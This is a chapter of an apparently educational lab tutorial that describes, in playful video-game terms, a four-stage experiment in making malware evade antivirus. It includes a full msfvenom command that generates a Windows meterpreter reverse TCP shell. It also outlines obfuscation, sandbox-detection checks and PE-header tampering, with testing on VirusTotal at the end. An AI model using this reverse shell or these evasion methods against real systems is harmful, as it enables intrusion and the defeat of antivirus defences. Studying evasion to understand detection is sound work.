# 3. Experiment Methodology 

Alright, now that you're all set up with the tools and your virtual machine is ready to go, let's talk about what we're actually going to do in this experiment. Think of this as your **map** to becoming a malware magician —but don't worry, we’ll walk through everything step by step. Let’s break down the plan into four epic stages, like levels in a video game!

---

## Level 1: Generating the Base Malware

### **What Are We Doing?**
We’re going to use a cool tool called **msfvenom** to create some basic malware—specifically, a **reverse TCP shell**. Sounds intense, right? Don’t worry—it’s just fancy hacker-speak for a piece of code that connects back to an attacker’s computer, waiting for commands.

### **Why Are We Doing This?**
Before we can make our malware invisible to antivirus software, we need to have some malware to work with! This is like building the skeleton of a villain before giving it a disguise.

### **What Tools Are We Using?**
- **msfvenom**: Our malware creation tool.
  
### **What’s the Process?**
We’ll run a command like this in the terminal:
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_IP> LPORT=443 -f c > evilexp.c
```
Don’t worry about the details now; we’ll explain what’s going on as we go. For now, just know that this command generates the basic **shellcode**—our starting point!

---

## Level 2: Modifying the Code to Fool Antivirus

### **What Are We Doing?**
Now that we’ve got our base malware, it’s time to put on its first disguise! We’ll modify the code itself by adding harmless changes that make it look different but keep it functioning the same way. This is called **code obfuscation**.

Think of it like changing the spelling of a word without changing its meaning, like writing "gr8" instead of "great." Antivirus software won’t know the difference (at least, that’s the plan!).

### **Why Are We Doing This?**
Antivirus programs look for known patterns (like malware signatures) to catch bad guys. By changing how our malware looks, we make it harder for the antivirus to recognize it!

### **What Tools Are We Using?**
- **Text editor**: Any editor will do to tweak our malware's code (VS Code, Notepad++, etc.).
  
### **What’s the Process?**
We’ll manually edit the **assembly code** or byte-level representation of our shellcode. This could involve inserting **NOPs** (no-operation instructions) or changing some instructions without affecting the malware’s behavior. For example:
- Adding extra lines of useless code that don’t change what the malware does.
- Changing how certain instructions are written to make the code look different.

These tiny modifications can help our malware slip past antivirus scanners like a ninja in the night.

---

## Level 3: Adding Anti-Dynamic Analysis Superpowers

### **What Are We Doing?**
Now we’re getting fancy! In this stage, we’re adding **anti-dynamic analysis techniques**. This is like adding superpowers to our malware so it can detect if it’s being watched by antivirus programs or running in a sandbox (a controlled environment where the antivirus tests it).

We’ll use tricks like checking if the computer has audio drivers or USB devices connected—things that real machines usually have but sandbox environments often don’t.

### **Why Are We Doing This?**
When antivirus programs want to see if a file is dangerous, they sometimes run it in a sandbox to observe its behavior. We want our malware to recognize when it’s in a sandbox and behave normally—like a spy pretending to be a regular person when they know they’re being watched.

### **What Tools Are We Using?**
- **Assembly code**: We’ll manually modify the shellcode to include these tricks.

### **What’s the Process?**
We’ll add code to our malware that checks for clues it’s being run in a sandbox, like:
- **Audio driver check**: If only the default "Primary Sound Driver" is found, it might be a sandbox.
- **USB device check**: If there’s no USB device connected, it could be a sign of a sandbox.

By adding these sneaky checks, we can make our malware stop doing anything bad when it thinks it’s being watched. Smart, right?

---

## Level 4: Modifying the PE Header for Extra Stealth 🕶️

### **What Are We Doing?**
In this final stage, we’ll go full undercover by modifying the **PE (Portable Executable) header**. This is like giving our malware a completely new identity—changing its name tag and even its fake mustache.

The PE header contains important information about the file, like its version, size, and where it loads in memory. By tweaking this info, we make it harder for antivirus programs to match the malware to their database of known threats.

### **Why Are We Doing This?**
Antivirus software often uses **hashes** (unique digital fingerprints) of files to identify malware. If we change enough of the file’s structure—without messing up how it runs—we can make our malware look totally new, and therefore, undetectable.

### **What Tools Are We Using?**
- **PE Tools**: We’ll use scripts or tools to modify the PE header, or we can do it manually by editing the binary file.
  
### **What’s the Process?**
We’ll alter parts of the PE header, like:
- **Section names**: Randomly change the names of different parts of the file (e.g., `.text` to `.fun`).
- **Timestamps**: Modify the creation date and time so it looks like a brand-new file.

With these changes, our malware will be like a master of disguise, ready to blend in with other files.

---

## Final Step: Testing the Malware’s Evasion Skills

Once we’ve completed all four levels, it’s time to see how good our malware really is at sneaking past antivirus software! We’ll upload it to services like **VirusTotal** and **VirusScan** and see how many antivirus engines catch it (hopefully not many!).

We’ll also test it in our virtual machine using **Kaspersky** or any other antivirus installed inside to see if it raises any alarms. This is where all your hard work pays off, as you watch your sneaky malware outsmart those antivirus programs!

---

## The Big Picture

So, to recap, here’s the whole experiment in a nutshell:
1. **Generate** the base malware (shellcode).
2. **Modify** the code to obfuscate it and fool antivirus programs.
3. **Add tricks** to make it dodge sandbox detection.
4. **Change its identity** by modifying the PE header.
5. **Test** its evasion skills against antivirus software.

By the end of this experiment, you’ll have a much deeper understanding of how malware works and how it evades detection. You’ll also learn how antivirus software tries to stay one step ahead. It’s like a cat-and-mouse game, but with code!
